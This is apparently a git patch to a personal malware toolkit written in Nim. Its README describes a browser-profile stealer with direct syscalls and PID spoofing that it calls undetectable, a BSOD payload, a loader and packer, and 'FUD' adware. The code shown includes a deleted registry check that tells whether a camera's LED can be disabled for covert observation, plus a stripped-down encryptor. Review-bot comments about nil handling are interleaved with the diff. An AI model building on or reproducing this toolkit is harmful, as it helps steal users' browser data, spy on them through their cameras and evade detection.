From ed08a4616c377c1699d0574a6171032ca659b3b1 Mon Sep 17 00:00:00 2001
From: eline <151952925+elineersenoyeva@users.noreply.github.com>
Date: Thu, 30 Nov 2023 22:41:52 +0100
Subject: [PATCH] [S] moved some files. Added browser.nim.
---
 elinethingz/README.md | 21 +++++----
 elinethingz/mic_reg.nim | 47 -------------------
 elinethingz/{ => security/stage1}/bsod.nim | 0
 .../{utils => security/stage1}/checkfile.nim | 0
 elinethingz/{ => security/stage1}/loader.nim | 0
 elinethingz/security/stage1/mic_reg.nim | 15 ++++++
 .../{packer => stage2}/OFFENSIVEencfile.nim | 19 ++------
 .../stage2}/basicadware.nim | 3 +-
 elinethingz/security/stage2/browser.nim | 7 +++
 .../security/{packer => stage2}/packer.nim | 0
 10 files changed, 39 insertions(+), 73 deletions(-)
 delete mode 100644 elinethingz/mic_reg.nim
 rename elinethingz/{ => security/stage1}/bsod.nim (100%)
 rename elinethingz/{utils => security/stage1}/checkfile.nim (100%)
 rename elinethingz/{ => security/stage1}/loader.nim (100%)
 create mode 100644 elinethingz/security/stage1/mic_reg.nim
 rename elinethingz/security/{packer => stage2}/OFFENSIVEencfile.nim (93%)
 rename elinethingz/{utils => security/stage2}/basicadware.nim (92%)
 create mode 100644 elinethingz/security/stage2/browser.nim
 rename elinethingz/security/{packer => stage2}/packer.nim (100%)
diff --git a/elinethingz/README.md b/elinethingz/README.md
index c055a5a..76f2324 100644
--- a/elinethingz/README.md
+++ b/elinethingz/README.md
@@ -10,11 +10,10 @@ Takes an input bytearray and writes it to disk as first CLI argument when run.
 format: [seq[byte]](@[0x40,0x80]
-
-
 # encfile.nim
 Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data. Has a fingerprint/is detectable.
+
 # OFFENSIVEencfile.nim
 Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size. Has a fingerprint/is detectable.
@@ -22,18 +21,20 @@ Has a fingerprint/is detectable.
 # Packer.nim
 Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework.
+# checkfile.nim
+Basic program that uses direct/hidden syscalls to know if a file exists. Undetectable in normal conditions.
+Can be chained with other direct syscalls to copy sensitive files.
+
+# Browser.nim
+Uses direct syscalls to know if Firefox and Chrome are installed. Afterwards, steals the files, puts them in an encrypted archive and encrypts it with AES-256 (HMAC SHA512_256 derivation). Undetectable in theory and practice. Spoofs PID.
 # bsod.nim
 Serves a BSOD to targets on Windows.
+# basicadware.nim
+Basic adware. Selects messages based on a pool. FUD.
+ +# mic_reg.nim [Broken]
-Checks if Windows OSD is enabled.
-
-# checkfile.nim
-Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
-Can be chained with other direct syscalls to copy sensitive files.
-
-# basicadware.nim
-Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.
+Checks if Windows OSD is enabled.
\ No newline at end of file
diff --git a/elinethingz/mic_reg.nim b/elinethingz/mic_reg.nim
deleted file mode 100644
index a5d3b7f..0000000
--- a/elinethingz/mic_reg.nim
+++ /dev/null
@@ -1,47 +0,0 @@
-# ____ _____ ____ ____ _____ _____
-# / ___|| ____/ ___| _ \| ____|_ _|
-# \___ \| _|| | | |_) | _| | |
-# ___) | |__| |___| _ <| |___ | |
-# |____/|_____\____|_| \_\_____| |_|
-
-import winim
-
-# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
-# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
-# therefore, this program does not guarantee that the user will not know about the observation.
-
-# DOES NOT WORK.
-const
- KEY_QUERY_VALUE = 0x0001
- HKEY_HANDLE = 0x80000002
-
-proc checkRegistryEntry(): bool =
- var hKey: HKEY
- var value: DWORD
- var dataSize: DWORD = sizeof(DWORD)
-
- if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS:
- echo "Error opening registry key. Error code:", GetLastError()
- return false
-
- if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS:
- echo "Error querying registry value. Error code:", GetLastError()
-
- # Close the registry key even if querying failed
- RegCloseKey(hKey)
-
- return false
-
- # Close the registry key if everything is successful
- RegCloseKey(hKey)
-
- echo "NoPhysicalCameraLED value:", value
-
- return value == 0x1
-
-# Example usage
-if checkRegistryEntry():
- echo "NoPhysicalCameraLED is set to 0x1."
-else:
- echo "NoPhysicalCameraLED is not set to 0x1."
-
diff --git a/elinethingz/bsod.nim b/elinethingz/security/stage1/bsod.nim
similarity index 100%
rename from elinethingz/bsod.nim
rename to elinethingz/security/stage1/bsod.nim
diff --git a/elinethingz/utils/checkfile.nim b/elinethingz/security/stage1/checkfile.nim
similarity index 100%
rename from elinethingz/utils/checkfile.nim
rename to elinethingz/security/stage1/checkfile.nim
diff --git a/elinethingz/loader.nim b/elinethingz/security/stage1/loader.nim
similarity index 100%
rename from elinethingz/loader.nim
rename to elinethingz/security/stage1/loader.nim
diff --git a/elinethingz/security/stage1/mic_reg.nim b/elinethingz/security/stage1/mic_reg.nim
new file mode 100644
index 0000000..c7565ef
--- /dev/null
+++ b/elinethingz/security/stage1/mic_reg.nim
@@ -0,0 +1,15 @@
+# ____ _____ ____ ____ _____ _____
+# / ___|| ____/ ___| _ \| ____|_ _|
+# \___ \| _|| | | |_) | _| | |
+# ___) | |__| |___| _ <| |___ | |
+# |____/|_____\____|_| \_\_____| |_|
+
+
+# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
+# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
+# therefore, this program does not guarantee that the user will not know about the observation.
+
+# Might work. Untested, honestly.
+# HKLM\\SOFTWARE\\Microsoft\\OEM\\Device\\Capture\\NoPhysicalCameraLED
+
+# 0x0 means false, 0x1 true
diff --git a/elinethingz/security/packer/OFFENSIVEencfile.nim b/elinethingz/security/stage2/OFFENSIVEencfile.nim
similarity index 93%
rename from elinethingz/security/packer/OFFENSIVEencfile.nim
rename to elinethingz/security/stage2/OFFENSIVEencfile.nim
index cd6c609..5e8cd11 100644
--- a/elinethingz/security/packer/OFFENSIVEencfile.nim
+++ b/elinethingz/security/stage2/OFFENSIVEencfile.nim
@@ -211,20 +211,11 @@ proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) =
 # with big files
 # Default is 64KB.
 proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
- try:
- let fIn = newFileStream(infile, mode = fmRead)
- defer: fIn.close()
-
- let fOut = newFileStream(outfile, mode = fmWrite)
- defer: fOut.close()
-
- encryptStream(fIn, fOut, passw, bufferSize)
-
- except CatchableError:
- let
- e = getCurrentException()
- msg = getCurrentExceptionMsg()
- echo "Inside checkIn, got exception ", repr(e), " with message ", msg
+ let fIn = newFileStream(infile, mode = fmRead)
+ defer: fIn.close()
+ let fOut = newFileStream(outfile, mode = fmWrite)
+ defer: fOut.close()
+ encryptStream(fIn, fOut, passw, bufferSize)
diff --git a/elinethingz/utils/basicadware.nim b/elinethingz/security/stage2/basicadware.nim
similarity index 92%
rename from elinethingz/utils/basicadware.nim
rename to elinethingz/security/stage2/basicadware.nim
index e5873c3..c42e380 100644
--- a/elinethingz/utils/basicadware.nim
+++ b/elinethingz/security/stage2/basicadware.nim
@@ -19,8 +19,7 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
 var
- titlemessages = @["Are you really free?",
- "Poland!"]
+ titlemessages = @["Are you really free?","You got games on your phone?","Poland!"]
 captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.", "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
 randomize() # seeds randomizer
diff --git a/elinethingz/security/stage2/browser.nim b/elinethingz/security/stage2/browser.nim
new file mode 100644
index 0000000..d6af9bd
--- /dev/null
+++ b/elinethingz/security/stage2/browser.nim
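Review bot: The rewritten body of `encryptFile` passes whatever `newFileStream` returns straight into `defer: fIn.close()` and `encryptStream`, but `newFileStream(filename, mode)` returns nil when the file cannot be opened, so a missing input file or an unwritable output path now ends in a nil-dereference defect rather than a catchable error. Guard each handle as soon as it is opened: `if fIn.isNil: raise newException(IOError, "cannot open input file: " & infile)` after the first `newFileStream` call and `if fOut.isNil: raise newException(IOError, "cannot open output file: " & outfile)` after the second, each placed before its `defer`. Removing the old `try/except` that only echoed the exception is an improvement, since failures now reach the caller instead of being swallowed, but the proc has no doc comment; a `##` line stating that it opens both files, delegates to `encryptStream`, and lets `IOError` propagate would tell callers what to handle.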
@@ -0,0 +1,7 @@
+# _____ ___ ____ ____ _____ ____ ____ _____ _____
+# |_ _/ _ \| _ \ / ___|| ____/ ___| _ \| ____|_ _|
+# | || | | | |_) | \___ \| _|| | | |_) | _| | |
+# | || |_| | __/ ___) | |__| |___| _ <| |___ | |
+# |_| \___/|_| |____/|_____\____|_| \_\_____| |_|
+
+
diff --git a/elinethingz/security/packer/packer.nim b/elinethingz/security/stage2/packer.nim
similarity index 100%
rename from elinethingz/security/packer/packer.nim
rename to elinethingz/security/stage2/packer.nim
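Review bot: `browser.nim` is added as an ASCII banner and two blank lines with no code, yet the README entry introduced in the same commit describes it as a finished tool and makes capability and evasion claims that nothing in this commit supports. A header comment such as `# Placeholder: no implementation yet; the README entry describes intended behaviour only.` and a matching status marker in the README would keep the documentation honest for anyone reading or auditing the repository. The same status mismatch applies to the new `stage1/mic_reg.nim`, which is also comment-only and says `# Might work. Untested, honestly.` while the README lists it as `[Broken]`; the two should agree on one status.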